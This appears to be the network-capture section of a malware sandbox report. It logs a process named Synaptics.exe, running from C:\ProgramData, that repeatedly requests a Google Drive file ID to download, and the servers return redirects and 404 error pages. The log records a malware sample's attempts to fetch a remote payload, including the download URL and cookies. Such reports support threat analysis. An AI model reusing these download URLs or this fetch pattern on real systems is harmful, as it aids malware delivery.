                                                                                                                              2024-12-30 10:48:17 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:17 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC6PiOFyvkfDrMR0zebEZ6o06xcceZz9wmqMNHRYqjQihQDGOfyXekAmGXWekRLUDOF8w4F6j30
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:17 GMT
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-zdJdon7oL7qixv9tP7fR1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:17 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:17 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 6e 72 74 38 31 45 59 38 30 59 51 67 59 6a 49 63 6d 7a 79 73 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="4nrt81EY80YQgYjIcmzysw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:17 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              54192.168.2.449829142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:17 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:17 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC7ccSWyK5kZhZiLVqwshWjRxPuGztISd5VZE3F8QuMGMUAIe2zj7tOXX0CSAHJB4J8x
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:17 GMT
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-x6obK0a2zEhnY0ZWoIuqXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:17 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:17 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 51 37 77 48 41 76 6c 53 38 38 6b 6b 59 62 7a 4f 65 58 77 5a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="AQ7wHAvlS88kkYbzOeXwZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:17 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              55192.168.2.449831142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:17 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                                                                                                                              2024-12-30 10:48:18 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:17 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-AD8u37FBRd6ihMuqLn15Hg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              56192.168.2.449832142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:17 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              57192.168.2.449833142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:18 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              58192.168.2.449834142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:18 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              59192.168.2.449840142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:18 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:19 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC5drAjQQAOXjokjeDlJ1tWBWtbunS4sc6Cc9ieffBcKybId6H2nDXZiLVTE9BQm_9zlmSscZ7o
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:19 GMT
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-AgBI3Q2mwcnCxZjtf6aNYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:19 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:19 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 37 33 54 56 4d 46 4a 54 2d 4b 4f 48 74 34 33 77 75 49 37 4b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="W73TVMFJT-KOHt43wuI7KQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:19 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              60192.168.2.449839142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:18 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:19 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:19 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-YGWDMM_Hn-DroZDyLfPf3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              61192.168.2.449838142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:18 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:19 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:19 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-r8KZU3bT71x4XdFPBfRbgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              62192.168.2.449845142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:19 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:20 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:20 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
